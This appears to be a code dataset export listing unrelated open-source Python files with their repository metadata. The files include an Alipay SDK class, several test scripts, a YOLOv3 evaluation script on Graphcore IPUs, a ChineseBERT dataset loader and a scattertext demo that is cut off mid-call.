max_stars_repo_path
stringlengths 4
245
| max_stars_repo_name
stringlengths 7
115
| max_stars_count
int64 101
368k
| id
stringlengths 2
8
| content
stringlengths 6
1.03M
|
---|---|---|---|---|
alipay/aop/api/domain/QuotaGradientRule.py | antopen/alipay-sdk-python-all | 213 | 12769620 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
class QuotaGradientRule(object):
def __init__(self):
self._score_400 = None
self._score_450 = None
self._score_500 = None
self._score_550 = None
self._score_600 = None
self._score_650 = None
self._score_700 = None
self._score_750 = None
self._score_800 = None
self._score_850 = None
self._score_900 = None
self._score_950 = None
@property
def score_400(self):
return self._score_400
@score_400.setter
def score_400(self, value):
self._score_400 = value
@property
def score_450(self):
return self._score_450
@score_450.setter
def score_450(self, value):
self._score_450 = value
@property
def score_500(self):
return self._score_500
@score_500.setter
def score_500(self, value):
self._score_500 = value
@property
def score_550(self):
return self._score_550
@score_550.setter
def score_550(self, value):
self._score_550 = value
@property
def score_600(self):
return self._score_600
@score_600.setter
def score_600(self, value):
self._score_600 = value
@property
def score_650(self):
return self._score_650
@score_650.setter
def score_650(self, value):
self._score_650 = value
@property
def score_700(self):
return self._score_700
@score_700.setter
def score_700(self, value):
self._score_700 = value
@property
def score_750(self):
return self._score_750
@score_750.setter
def score_750(self, value):
self._score_750 = value
@property
def score_800(self):
return self._score_800
@score_800.setter
def score_800(self, value):
self._score_800 = value
@property
def score_850(self):
return self._score_850
@score_850.setter
def score_850(self, value):
self._score_850 = value
@property
def score_900(self):
return self._score_900
@score_900.setter
def score_900(self, value):
self._score_900 = value
@property
def score_950(self):
return self._score_950
@score_950.setter
def score_950(self, value):
self._score_950 = value
def to_alipay_dict(self):
params = dict()
if self.score_400:
if hasattr(self.score_400, 'to_alipay_dict'):
params['score_400'] = self.score_400.to_alipay_dict()
else:
params['score_400'] = self.score_400
if self.score_450:
if hasattr(self.score_450, 'to_alipay_dict'):
params['score_450'] = self.score_450.to_alipay_dict()
else:
params['score_450'] = self.score_450
if self.score_500:
if hasattr(self.score_500, 'to_alipay_dict'):
params['score_500'] = self.score_500.to_alipay_dict()
else:
params['score_500'] = self.score_500
if self.score_550:
if hasattr(self.score_550, 'to_alipay_dict'):
params['score_550'] = self.score_550.to_alipay_dict()
else:
params['score_550'] = self.score_550
if self.score_600:
if hasattr(self.score_600, 'to_alipay_dict'):
params['score_600'] = self.score_600.to_alipay_dict()
else:
params['score_600'] = self.score_600
if self.score_650:
if hasattr(self.score_650, 'to_alipay_dict'):
params['score_650'] = self.score_650.to_alipay_dict()
else:
params['score_650'] = self.score_650
if self.score_700:
if hasattr(self.score_700, 'to_alipay_dict'):
params['score_700'] = self.score_700.to_alipay_dict()
else:
params['score_700'] = self.score_700
if self.score_750:
if hasattr(self.score_750, 'to_alipay_dict'):
params['score_750'] = self.score_750.to_alipay_dict()
else:
params['score_750'] = self.score_750
if self.score_800:
if hasattr(self.score_800, 'to_alipay_dict'):
params['score_800'] = self.score_800.to_alipay_dict()
else:
params['score_800'] = self.score_800
if self.score_850:
if hasattr(self.score_850, 'to_alipay_dict'):
params['score_850'] = self.score_850.to_alipay_dict()
else:
params['score_850'] = self.score_850
if self.score_900:
if hasattr(self.score_900, 'to_alipay_dict'):
params['score_900'] = self.score_900.to_alipay_dict()
else:
params['score_900'] = self.score_900
if self.score_950:
if hasattr(self.score_950, 'to_alipay_dict'):
params['score_950'] = self.score_950.to_alipay_dict()
else:
params['score_950'] = self.score_950
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = QuotaGradientRule()
if 'score_400' in d:
o.score_400 = d['score_400']
if 'score_450' in d:
o.score_450 = d['score_450']
if 'score_500' in d:
o.score_500 = d['score_500']
if 'score_550' in d:
o.score_550 = d['score_550']
if 'score_600' in d:
o.score_600 = d['score_600']
if 'score_650' in d:
o.score_650 = d['score_650']
if 'score_700' in d:
o.score_700 = d['score_700']
if 'score_750' in d:
o.score_750 = d['score_750']
if 'score_800' in d:
o.score_800 = d['score_800']
if 'score_850' in d:
o.score_850 = d['score_850']
if 'score_900' in d:
o.score_900 = d['score_900']
if 'score_950' in d:
o.score_950 = d['score_950']
return o
|
tacker/tests/unit/vnfm/policy_actions/respawn/test_respawn.py | takahashi-tsc/tacker | 116 | 12769672 | <reponame>takahashi-tsc/tacker
# Copyright (c) 2014-2018 China Mobile (SuZhou) Software Technology Co.,Ltd.
# All Rights Reserved
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import testtools
from unittest import mock
from tacker.common import clients
from tacker import context
from tacker.db.common_services import common_services_db_plugin
from tacker.plugins.common import constants
from tacker.vnfm.infra_drivers.openstack import heat_client as hc
from tacker.vnfm.policy_actions.respawn import respawn as \
policy_actions_respawn
from tacker.vnfm import vim_client
class VNFActionRespawn(testtools.TestCase):
def setUp(self):
super(VNFActionRespawn, self).setUp()
self.context = context.get_admin_context()
mock.patch('tacker.db.common_services.common_services_db_plugin.'
'CommonServicesPluginDb.create_event'
).start()
self._cos_db_plugin =\
common_services_db_plugin.CommonServicesPluginDb()
@mock.patch.object(clients.OpenstackClients, 'heat')
@mock.patch.object(hc.HeatClient, 'delete')
@mock.patch.object(vim_client.VimClient, 'get_vim')
def test_execute_action(self, mock_get_vim, mock_hc_delete, mock_heat):
action_respawn = policy_actions_respawn.VNFActionRespawn()
vnf_dict = {
'id': 'fake-id',
'status': 'fake-status',
'attributes': {
'monitoring_policy': 'fake-monitoring-policy',
'failure_count': '1',
'dead_instance_id_1': '00000000-0000-0000-0000-00000000001'},
'vim_id': 'fake-vim-id',
'vim_auth': 'fake-vim-auth',
'instance_id': '00000000-0000-0000-0000-000000000002',
'placement_attr': {
'region_name': 'fake-region-name'}}
mock_get_vim.return_value = {'vim_auth': {
'auth_url': 'http://fake-url/identity/v3'
}}
mock_hc_delete.return_value = True
plugin = mock.Mock()
plugin._mark_vnf_dead.return_value = True
plugin.create_vnf_sync.return_value = {'id': 'fake-id'}
plugin._vnf_monitor = mock.Mock()
action_respawn.execute_action(plugin, self.context, vnf_dict, None)
self._cos_db_plugin.create_event.assert_called_once_with(
self.context, res_id=vnf_dict['id'],
res_state=vnf_dict['status'],
res_type=constants.RES_TYPE_VNF,
evt_type=constants.RES_EVT_MONITOR,
tstamp=mock.ANY, details="ActionRespawnHeat invoked")
mock_get_vim.assert_called_once_with(self.context, vnf_dict['vim_id'])
plugin.create_vnf_sync.assert_called_with(self.context, vnf_dict)
plugin._vnf_monitor.mark_dead.assert_called_once_with(vnf_dict['id'])
|
eip96/eip_96_test_script.py | kevaundray/research | 1,351 | 12769694 | from ethereum import tester, vm
from ethereum.utils import sha3, encode_int32, safe_ord, encode_hex
from ethereum.state_transition import apply_message
s = tester.state()
c = s.contract('eip_96_blockhash_getter.se.py')
blockhash_addr = b'\x00' * 19 + b'\x10'
system_addr = b'\xff' * 19 + b'\xfe'
s.state.set_code(blockhash_addr, s.state.get_code(c))
def mk_hash_setting_message(data):
return vm.Message(sender=system_addr, to=blockhash_addr, value=0, gas=1000000, data=data)
print("Setting block hashes")
for i in range(1, 1000):
s.state.block_number = i + 1
o = apply_message(s.state, mk_hash_setting_message(sha3(str(i))))
if i % 100 == 0:
print("Set %d" % i)
print("Testing reads")
s.state.block_number = 1000
assert s.send(tester.k0, blockhash_addr, 0, encode_int32(999)) == sha3(str(999))
assert s.send(tester.k0, blockhash_addr, 0, encode_int32(998)) == sha3(str(998))
assert s.send(tester.k0, blockhash_addr, 0, encode_int32(744)) == sha3(str(744))
assert s.send(tester.k0, blockhash_addr, 0, encode_int32(743)) == b'\x00' * 32
assert s.send(tester.k0, blockhash_addr, 0, encode_int32(1000)) == b'\x00' * 32
assert s.send(tester.k0, blockhash_addr, 0, encode_int32(1001)) == b'\x00' * 32
assert s.send(tester.k0, blockhash_addr, 0, encode_int32(513)) == b'\x00' * 32
assert s.send(tester.k0, blockhash_addr, 0, encode_int32(512)) == sha3(str(512))
assert s.send(tester.k0, blockhash_addr, 0, encode_int32(511)) == b'\x00' * 32
assert s.send(tester.k0, blockhash_addr, 0, encode_int32(256)) == sha3(str(256))
print("Tests passed!")
print("EVM code: 0x%s" % encode_hex(s.state.get_code(blockhash_addr)))
|
applications/tensorflow/detection/yolov3/evaluate.py | payoto/graphcore_examples | 260 | 12769727 | #! /usr/bin/env python
# coding=utf-8
# Copyright (c) 2021 Graphcore Ltd. All Rights Reserved.
# Copyright (c) 2019 YunYang1994 <<EMAIL>>
# License: MIT (https://opensource.org/licenses/MIT)
# This file has been modified by Graphcore Ltd.
import argparse
import json
import math
import os
import shutil
import time
import numpy as np
import core.utils as utils
import cv2
import log
import tensorflow as tf
from core.dataset import Dataset
from core.yolov3 import YOLOV3
from ipu_utils import stages_constructor
from log import logger
from tensorflow.python import ipu
from tensorflow.python.ipu import ipu_infeed_queue, ipu_outfeed_queue, loops
class YoloTest(object):
def __init__(self, opts):
self.input_size = opts["test"]["input_size"]
self.classes = utils.read_class_names(opts["yolo"]["classes"])
self.num_classes = len(self.classes)
self.score_threshold = opts["test"]["score_threshold"]
self.iou_threshold = opts["test"]["iou_threshold"]
self.moving_avg_decay = opts["yolo"]["moving_avg_decay"]
self.annotation_path = opts["test"]["annot_path"]
self.weight_file = opts["test"]["weight_file"]
self.write_image = opts["test"]["write_image"]
self.write_image_path = opts["test"]["write_image_path"]
self.show_label = opts["test"]["show_label"]
self.batch_size = opts["test"]["batch_size"]
self.precision = tf.float16 if opts["yolo"]["precision"] == "fp16" else tf.float32
self.use_moving_avg = opts["yolo"]["use_moving_avg"]
self.repeat_count = opts["test"]["repeat_count"]
self.use_infeed_queue = opts["test"]["use_infeed_queue"]
self.predicted_file_path = opts["test"]["predicted_file_path"]
self.ground_truth_file_path = opts["test"]["ground_truth_file_path"]
self.meta_dict = {}
self.testset = Dataset("test", opts)
# Configure arguments for targeting the IPU
config = ipu.config.IPUConfig()
config.auto_select_ipus = 1
config.configure_ipu_system()
model = YOLOV3(False, opts)
# construct model
# we will put whole network on one ipu
layers = []
# build layer functions for backbone and upsample
layers.extend(model.build_backbone())
# last layer of darknet53 is classification layer, so it have 52 conv layers
assert len(layers) == 52
layers.extend(model.build_upsample())
# there is 25 conv layers if we count upsmaple as a conv layer
assert len(layers) == 52+25
# decoding layer and loss layer is always put on last IPU
layers.append(model.decode_boxes)
# reuse stages_constructor so we don't need to pass params by hand
network_func = stages_constructor(
[layers],
["input_data", "nums"],
["pred_sbbox", "pred_mbbox", "pred_lbbox", "nums"])[0]
input_shape = (self.batch_size, self.input_size, self.input_size, 3)
self.lines, self.image_dict = self.load_data()
if self.use_infeed_queue:
# The dataset for feeding the graphs
def data_gen():
return self.data_generator()
with tf.device("cpu"):
ds = tf.data.Dataset.from_generator(data_gen,
output_types=(tf.float16, tf.int32),
output_shapes=(input_shape, (self.batch_size,))
)
ds = ds.repeat()
ds = ds.prefetch(self.repeat_count*10)
# The host side queues
infeed_queue = ipu_infeed_queue.IPUInfeedQueue(ds)
outfeed_queue = ipu_outfeed_queue.IPUOutfeedQueue()
def model_func(input_data, nums):
pred_sbbox, pred_mbbox, pred_lbbox, nums = network_func(input_data, nums)
outfeed = outfeed_queue.enqueue(
{"pred_sbbox": pred_sbbox, "pred_mbbox": pred_mbbox, "pred_lbbox": pred_lbbox, "nums": nums})
return outfeed
def my_net():
r = loops.repeat(self.repeat_count,
model_func, [], infeed_queue)
return r
with ipu.scopes.ipu_scope("/device:IPU:0"):
self.run_loop = ipu.ipu_compiler.compile(
my_net, inputs=[])
# The outfeed dequeue has to happen after the outfeed enqueue
self.dequeue_outfeed = outfeed_queue.dequeue()
self.sess = tf.Session(config=tf.ConfigProto())
self.sess.run(infeed_queue.initializer)
else:
# if using feed dict, it will be simpler
# the cost is throughput
with tf.device("cpu"):
with tf.name_scope("input"):
# three channel images
self.input_data = tf.placeholder(
shape=input_shape, dtype=self.precision, name="input_data")
self.nums = tf.placeholder(
shape=(self.batch_size), dtype=tf.int32, name="nums")
with ipu.scopes.ipu_scope("/device:IPU:0"):
self.output = ipu.ipu_compiler.compile(
network_func, [self.input_data, self.nums])
self.sess = tf.Session(
config=tf.ConfigProto())
if self.use_moving_avg:
with tf.name_scope("ema"):
ema_obj = tf.train.ExponentialMovingAverage(
self.moving_avg_decay)
self.saver = tf.train.Saver(ema_obj.variables_to_restore())
else:
self.saver = tf.train.Saver()
self.saver.restore(self.sess, self.weight_file)
def load_data(self):
with open(self.annotation_path, "r") as annotation_file:
# load_all images
lines = []
for line in annotation_file:
lines.append(line)
image_dict = self.testset.load_images(dump=False)
return lines, image_dict
def data_generator(self):
"""Generate input image and write groundtruth info
"""
if os.path.exists(self.write_image_path):
shutil.rmtree(self.write_image_path)
os.mkdir(self.write_image_path)
self.ground_truth_file = open(self.ground_truth_file_path, "w")
image_datas = []
nums = []
for num, line in enumerate(self.lines):
annotation = line.strip().split()
image_path = annotation[0]
image_name = image_path.split("/")[-1]
image = self.image_dict[line.strip()]
bbox_data_gt = np.array(
[list(map(int, box.split(","))) for box in annotation[1:]])
if len(bbox_data_gt) == 0:
bboxes_gt = []
classes_gt = []
else:
bboxes_gt, classes_gt = bbox_data_gt[:,
:4], bbox_data_gt[:, 4]
num_bbox_gt = len(bboxes_gt)
# output ground-truth
self.ground_truth_file.write(str(num)+":\n")
for i in range(num_bbox_gt):
class_name = self.classes[classes_gt[i]]
xmin, ymin, xmax, ymax = list(map(str, bboxes_gt[i]))
bbox_mess = ",".join(
[class_name, xmin, ymin, xmax, ymax]) + "\n"
self.ground_truth_file.write(bbox_mess)
image_copy = np.copy(image)
org_h, org_w, _ = image.shape
image_data = utils.resize_image(
image_copy, [self.input_size, self.input_size])
# we don't want to pass metadata through pipeline
# so we'll keep it with a dictionary
self.meta_dict[num] = [org_h, org_w, image_name, line]
image_datas.append(image_data)
nums.append(num)
if len(nums) < self.batch_size:
if num < len(self.lines) - 1:
continue
else:
# if there's not enough data to fill the last batch
# we repeat the last image to yield a full sized batch
for _ in range(len(image_datas), self.batch_size):
image_datas.append(image_datas[-1])
nums.append(nums[-1])
image_datas = np.array(image_datas).astype(np.float16)
yield (image_datas, nums)
if num < len(self.lines) - 1:
image_datas = []
nums = []
while True:
# if using infeed_queue. it will need more batches
# to padd the data and meet the required repeat_count
# so we will use last batch for padding
yield (image_datas, nums)
def parse_result(self, pred_sbbox_list, pred_mbbox_list, pred_lbbox_list, nums):
"""Parse and write predicted result
"""
for i in range(len(nums)):
# if nums value is repeated
# that means nums[i] is a repeated value for matching required batch size
# so we can stop the iteration
if i > 0 and nums[i] <= nums[i-1]:
break
num = nums[i]
pred_sbbox = pred_sbbox_list[i]
pred_mbbox = pred_mbbox_list[i]
pred_lbbox = pred_lbbox_list[i]
org_h, org_w, image_name, line = self.meta_dict[num]
image_path = line.strip().split()[0]
image = self.image_dict[line.strip()]
pred_bbox = np.concatenate([np.reshape(pred_sbbox, (-1, 5 + self.num_classes)),
np.reshape(
pred_mbbox, (-1, 5 + self.num_classes)),
np.reshape(pred_lbbox, (-1, 5 + self.num_classes))], axis=0)
# convert boxes from input_image coordinate to original image coordinate
bboxes = utils.postprocess_boxes(
pred_bbox, (org_h, org_w), self.input_size, self.score_threshold)
bboxes_pr = utils.nms(bboxes, self.iou_threshold)
if self.write_image:
image = utils.draw_bbox(
image, bboxes_pr, self.classes, show_label=self.show_label)
cv2.imwrite(self.write_image_path+image_name, image)
self.predict_result_file.write(str(num)+":\n")
for bbox in bboxes_pr:
coor = np.array(bbox[:4], dtype=np.int32)
score = bbox[4]
class_ind = int(bbox[5])
class_name = self.classes[class_ind]
score = "%.4f" % score
xmin, ymin, xmax, ymax = list(map(str, coor))
bbox_mess = ",".join(
[class_name, score, xmin, ymin, xmax, ymax]) + "\n"
self.predict_result_file.write(bbox_mess)
def evaluate(self):
self.predict_result_file = open(self.predicted_file_path, "w")
if self.use_infeed_queue:
# using infeed queue to improve throughput
# we can use an additional thread to run dequeue_outfeed for decrease latency and further improve throughput
total_samples = len(self.lines)
interaction_samples = self.batch_size*self.repeat_count
total_interactions = total_samples/interaction_samples
total_interactions = math.ceil(total_interactions)
for interaction_index in range(total_interactions):
run_start = time.time()
self.sess.run(self.run_loop)
result = self.sess.run(
self.dequeue_outfeed)
run_duration = time.time()-run_start
pred_sbbox_list, pred_mbbox_list, pred_lbbox_list, nums = result[
"pred_sbbox"], result["pred_mbbox"], result["pred_lbbox"], result["nums"]
for i in range(len(nums)):
# len(nums) == repeat_count
# there's repeat count number of batches for each run
if i > 0 and nums[i][0] <= nums[i-1][0]:
# ignore repeated data
# these are only for meeting data size required when using ipu.loops.repeat
break
self.parse_result(pred_sbbox_list[i], pred_mbbox_list[i], pred_lbbox_list[i], nums[i])
logger.info("progress:{}/{} ,latency: {}, through put: {}, batch size: {}, repeat count: {}".format(
(interaction_index+1)*interaction_samples, len(self.lines),
run_duration,
interaction_samples/run_duration,
self.batch_size,
self.repeat_count))
else:
# if not use infeed_queue, it will return for every batch
data_gen = self.data_generator()
interaction_samples = self.batch_size
total_interactions = math.ceil(len(self.lines)/interaction_samples)
for interaction_index in range(total_interactions):
image_datas, nums = next(data_gen)
run_start = time.time()
pred_sbbox_list, pred_mbbox_list, pred_lbbox_list, nums = self.sess.run(
self.output,
feed_dict={
self.input_data: image_datas,
self.nums: nums
}
)
run_duration = time.time()-run_start
self.parse_result(pred_sbbox_list, pred_mbbox_list, pred_lbbox_list, nums)
logger.info("progress:{}/{} ,latency: {}, through put: {}, batch size: {}".format(
(interaction_index+1)*interaction_samples,
len(self.lines),
run_duration,
interaction_samples/run_duration,
self.batch_size))
self.ground_truth_file.close()
self.predict_result_file.close()
self.sess.close()
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description="evaluation in TensorFlow", add_help=False)
parser.add_argument("--config", type=str, default="config/config_800.json",
help="json config file for yolov3.")
parser.add_argument("--test_path", type=str, default="./data/dataset/voc_test.txt",
help="data path for test")
arguments = parser.parse_args()
with open(arguments.config) as f:
opts = json.load(f)
opts['test']['annot_path'] = arguments.test_path
YoloTest(opts).evaluate()
|
apps/init_before_startup.py | osroom/osroom | 579 | 12769737 | <filename>apps/init_before_startup.py
#!/usr/bin/env python
# -*-coding:utf-8-*-
# @Time : 2020/03/14 12:44
# @Author : <NAME>
import sys
from signal import signal, SIGCHLD, SIG_IGN
from pymongo.errors import OperationFailure
from apps.configs.db_config import DB_CONFIG
from apps.core.db.config_mdb import DatabaseConfig
from apps.core.db.mongodb import MyMongo
from apps.develop_run_options import start_info_print
from apps.app import app
from apps.brand_info import start_info
def init_before_startup(is_debug, csrf_enabled):
"""
启动前初始化相关数据
:param is_debug:
:param csrf_enabled:
:return:
"""
start_info()
start_info_print("\033[1;36m osroom staring...\033[0m")
# 网站还未启动的时候, 临时连接数据库, 更新collections & 系统配置
from apps.core.utils.update_sys_data import update_mdb_collections, init_datas, \
compatible_processing
database = DatabaseConfig()
mdbs = {}
# 创建局部临时数据库对象
for k, mdb_acc in DB_CONFIG["mongodb"].items():
mdbs[k] = MyMongo()
# 初始化2次,第一次初始化是为了更新mdb的collections
# 如果第一次更新后存在新的collections,需要再次初始化数据库供其他程序使用
db_init = 2
while db_init:
try:
for name, mdb in mdbs.items():
if db_init == 1:
mdb.close()
if name not in ["sys", "user", "web"]:
msg = "[Error]: 由v1.x.x更新到v2.x.x需要请更新你的数据库配置文件apps/configs/db_config.py." \
"请参考同目录下的db_config_sample.py"
start_info_print('\033[31m{}\033[0m'.format(msg))
sys.exit()
mdb.init_app(
config_prefix=name.upper(),
db_config=database.__dict__["{}_URI".format(name.upper())]
)
except OperationFailure as e:
msg = "\n[Mongodb] *{}\nMongodb validation failure, the user name, " \
"password mistake or database configuration errors.\n" \
"Tip: to open database authentication configuration".format(e)
start_info_print('\033[31m{}\033[0m'.format(msg))
sys.exit(-1)
if db_init == 2 and is_debug:
# 更新数据库文档表
start_info_print(" * Check or update the database collection")
update_mdb_collections(mdbs=mdbs)
else:
# 未更新数据库coll,无需二次初始化数据库,直接break
break
db_init -= 1
if not is_debug:
# 更新配置文件
from apps.core.flask.update_config_file import update_config_file
start_info_print(" * Update and sync config.py")
r = update_config_file(mdbs=mdbs)
if not r:
start_info_print("[Error] Update profile error, check log sys_start.log")
sys.exit(-1)
else:
msgs = " * The following services need to be run in a non-debugger state.\n" \
" Including the following services:- Automatic update of Mongodb collections.\n" \
" - Automatic update of website routing rights control.\n" \
" - Automatically update and merge system configuration.\n\n"
warning_msg = "\033[03m " \
"If the program runs incorrectly because the above configuration \n" \
" is not updated, you need to remove the debugger running program \n" \
" first to implement the update. After that, you can continue to run \n" \
" the program under the debugger."
start_info_print('\033[33m{}{}\033[0m'.format(msgs, warning_msg))
# 调用兼容程序step 1
compatible_processing(mdbs=mdbs, stage=1)
# 调用初始化数据
init_datas(mdbs=mdbs)
for mdb in mdbs.values():
mdb.close()
# 核心程序初始化+模块加载
from apps.core.flask.module_import import module_import
from apps.init_core_module import init_core_module
from apps.configs.sys_config import MODULES
init_core_module(
app,
csrf_enabled=csrf_enabled,
is_debug=is_debug
)
module_import(MODULES)
# 调用兼容程序step 2
from apps.app import mdbs
compatible_processing(mdbs=mdbs, stage=2)
if not is_debug:
start_info_print(
" * Signal:(SIGCHLD, SIG_IGN)."
"Prevent child processes from becoming [Defunct processes]."
"(Do not need to comment out)")
signal(SIGCHLD, SIG_IGN)
start_info_print(" * Started successfully")
else:
start_info_print(" * Debugger: Started successfully")
|
mac/pyobjc-core/libffi-src/tests/dejagnu.py | albertz/music-player | 132 | 12769762 | #!/usr/bin/python
"""
A very crude emulator of dejagnu, just enough to integrate the libbfi
unittests into the pyobjc ones.
"""
import os
import re
import sys
import signal
from fnmatch import fnmatch
import unittest
from distutils.util import get_platform
gDgCommands=re.compile(r'''
(?:{\s*(dg-do)\s*run\s*({[^}]*})?\s*})
|
(?:{\s*(dg-output)\s*"([^"]*)"\s*})
''',
re.VERBOSE|re.MULTILINE)
def signame(code):
for nm in dir(signal):
if nm.startswith('SIG') and nm[3] != '_' \
and getattr(signal, nm) == code:
return nm
return code
def exitCode2Description(code):
"""
Convert the exit code as returned by os.popen().close() to a string
"""
if os.WIFEXITED(code):
return 'exited with status %s'%(os.WEXITSTATUS(code),)
elif os.WIFSIGNALED(code):
sig = os.WTERMSIG(code)
return 'crashed with signal %s [%s]'%(signame(sig), sig)
else:
return 'exit code %s'%(code,)
def platform_matches(matchstr):
# This is a hack
if sys.byteorder == 'little':
platform = 'i386-apple-darwin'
else:
platform = 'powerpc-apple-darwin'
return fnmatch(platform, matchstr)
def parseDG(fdata):
result = []
for item in gDgCommands.findall(fdata):
if item[0] == 'dg-do':
result.append(('run', item[1]))
elif item[2] == 'dg-output':
result.append(('expect', item[3].decode('string_escape')))
return result
class DgTestCase (unittest.TestCase):
def __init__(self, filename):
unittest.TestCase.__init__(self)
self.filename = filename
#archOption = "-arch ppc"
#archOption = "-arch ppc64"
#archOption = "-arch i386"
archOption = "-arch x86_64"
#archOption = ""
compileOptionsBase = "-g -DMACOSX -Iinclude -o /tmp/test.bin -lffi"
compileOptionsList = ( # HACK ALERT: Yes, there are better ways to do this, but this is easy and extremely flexible
"%s %s %s" % (compileOptionsBase, archOption, "-O0"),
"%s %s %s" % (compileOptionsBase, archOption, "-O1"),
"%s %s %s" % (compileOptionsBase, archOption, "-O2"),
"%s %s %s" % (compileOptionsBase, archOption, "-O3"),
"%s %s %s" % (compileOptionsBase, archOption, "-Os"),
"%s %s %s" % (compileOptionsBase, archOption, "-Oz"), # Note: Apple-Only, see gcc man page for details
)
def runTest(self):
script = parseDG(open(self.filename).read())
output = []
for command, data in script:
if command == 'run':
action = 'run'
action_data = data
if command == 'expect':
output.append(data)
output = ''.join(output)
output = output.replace('\\', '')
d = action_data.split()
if d and d[1] == 'target':
for item in d[2:]:
if platform_matches(item):
break
else:
# Test shouldn't be run on this platform
return
# NOTE: We're ignoring the xfail data for now, none of the
# testcases are supposed to fail on darwin.
for compileOptions in self.compileOptionsList:
self.compileTestCase(compileOptions)
data = self.runTestCase()
if output != '':
self.assertEquals(data.rstrip(), output.rstrip())
os.unlink('/tmp/test.bin')
def shortDescription(self):
fn = os.path.basename(self.filename)[:-2]
dn = os.path.basename(os.path.dirname(self.filename))
return "dejagnu.%s.%s"%(dn, fn)
def compileTestCase(self, compileOptions):
# libdir = os.path.join('build', 'temp.%s-%d.%d'%(get_platform(), sys.version_info[0], sys.version_info[1]), 'libffi-src')
# libffiobjects = self.object_files(libdir)
commandline='cc %s %s 2>&1' % (compileOptions, self.filename)
fp = os.popen(commandline)
data = fp.read()
xit = fp.close()
if xit != None:
self.fail("Compile failed[%s]:\n%s"%(xit, data))
def runTestCase(self):
os.environ['DYLD_BIND_AT_LAUNCH'] = '1'
fp = os.popen('/tmp/test.bin', 'r')
del os.environ['DYLD_BIND_AT_LAUNCH']
data = fp.read()
xit = fp.close()
if xit != None:
self.fail("Running failed (%s)"%(exitCode2Description(xit),))
return data
def object_files(self, basedir):
result = []
for dirpath, dirnames, filenames in os.walk(basedir):
for fn in filenames:
if fn.endswith('.o'):
result.append(os.path.join(dirpath, fn))
return result
def testSuiteForDirectory(dirname):
tests = []
for fn in os.listdir(dirname):
if not fn.endswith('.c'): continue
tst = DgTestCase(os.path.join(dirname, fn))
if alltests and tst.shortDescription() not in alltests:
continue
tests.append(tst)
return unittest.TestSuite(tests)
alltests = []
if __name__ == "__main__":
alltests = sys.argv[1:]
runner = unittest.TextTestRunner(verbosity=2)
runner.run(testSuiteForDirectory('tests/testsuite/libffi.call'))
|
datasets/spm_dataset.py | chinaliwenbo/ChineseBert | 298 | 12769783 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
@file : spm_dataset.py
@author: zijun
@contact : <EMAIL>
@date : 2021/1/21 15:00
@version: 1.0
@desc : Dataset for sentence pair matching tasks
"""
from functools import partial
import torch
from torch.utils.data import DataLoader
from datasets.chinese_bert_dataset import ChineseBertDataset
from datasets.collate_functions import collate_to_max_length
class SPMDataset(ChineseBertDataset):
def get_lines(self):
with open(self.data_path, 'r') as f:
lines = f.readlines()
return lines
def __len__(self):
return len(self.lines)
def __getitem__(self, idx):
line = self.lines[idx]
third, first, second, _ = line.split('\t')
first = first.replace(" ", "")
second = second.replace(" ", "")
first_output = self.tokenizer.encode(first, add_special_tokens=False)
first_pinyin_tokens = self.convert_sentence_to_pinyin_ids(first, first_output)
second_output = self.tokenizer.encode(second, add_special_tokens=False)
second_pinyin_tokens = self.convert_sentence_to_pinyin_ids(second, second_output)
label = third
# convert sentence to id
bert_tokens = first_output.ids + [102] + second_output.ids
pinyin_tokens = first_pinyin_tokens + [[0] * 8] + second_pinyin_tokens
if len(bert_tokens) > self.max_length - 2:
bert_tokens = bert_tokens[:self.max_length - 2]
pinyin_tokens = pinyin_tokens[:self.max_length - 2]
# id nums should be same
assert len(bert_tokens) <= self.max_length
assert len(bert_tokens) == len(pinyin_tokens)
# convert list to tensor
input_ids = torch.LongTensor([101] + bert_tokens + [102])
pinyin_ids = torch.LongTensor([[0] * 8] + pinyin_tokens + [[0] * 8]).view(-1)
label = torch.LongTensor([int(label)])
return input_ids, pinyin_ids, label
def unit_test():
data_path = "/data/nfsdata2/sunzijun/glyce/tasks/BQ/dev.tsv"
chinese_bert_path = "/data/nfsdata2/sunzijun/glyce/best/ChineseBERT-base"
dataset = SPMDataset(data_path=data_path, chinese_bert_path=chinese_bert_path)
dataloader = DataLoader(
dataset=dataset,
batch_size=10,
num_workers=0,
shuffle=False,
collate_fn=partial(collate_to_max_length, fill_values=[0, 0, 0])
)
for input_ids, pinyin_ids, label in dataloader:
bs, length = input_ids.shape
print(input_ids.shape)
print(pinyin_ids.reshape(bs, length, -1).shape)
print(label.view(-1).shape)
print()
if __name__ == '__main__':
unit_test()
|
coding_interviews/leetcode/easy/generate_the_string/generate_the_string.py | LeandroTk/Algorithms | 205 | 12769803 | <gh_stars>100-1000
# https://leetcode.com/problems/generate-a-string-with-characters-that-have-odd-counts
def generate_the_string(n):
if n % 2 == 0:
return 'a' * (n - 1) + 'b'
return 'a' * n |
src/ebonite/ext/sqlalchemy/__init__.py | koskotG/ebonite | 270 | 12769864 | from .repository import SQLAlchemyMetaRepository
__all__ = ['SQLAlchemyMetaRepository']
|
demo_word_list_topic_model.py | shettyprithvi/scattertext | 1,823 | 12769877 | import scattertext as st
from scattertext import RankDifference
convention_df = st.SampleCorpora.ConventionData2012.get_data()
convention_df['parse'] = convention_df['text'].apply(st.whitespace_nlp_with_sentences)
unigram_corpus = (st.CorpusFromParsedDocuments(convention_df,
category_col='party',
parsed_col='parse')
.build().get_stoplisted_unigram_corpus())
topic_model = (st.SentencesForTopicModeling(unigram_corpus)
.get_topics_from_terms(['obama', 'romney', 'democrats', 'republicans',
'health', 'military', 'taxes', 'education',
'olympics', 'auto', 'iraq', 'iran', 'israel'],
scorer=RankDifference(), num_terms_per_topic=20))
topic_feature_builder = st.FeatsFromTopicModel(topic_model)
topic_corpus = st.CorpusFromParsedDocuments(
convention_df,
category_col='party',
parsed_col='parse',
feats_from_spacy_doc=topic_feature_builder
).build()
html = st.produce_scattertext_explorer(
topic_corpus,
category='democrat',
category_name='Democratic',
not_category_name='Republican',
width_in_pixels=1000,
metadata=convention_df['speaker'],
use_non_text_features=True,
use_full_doc=True,
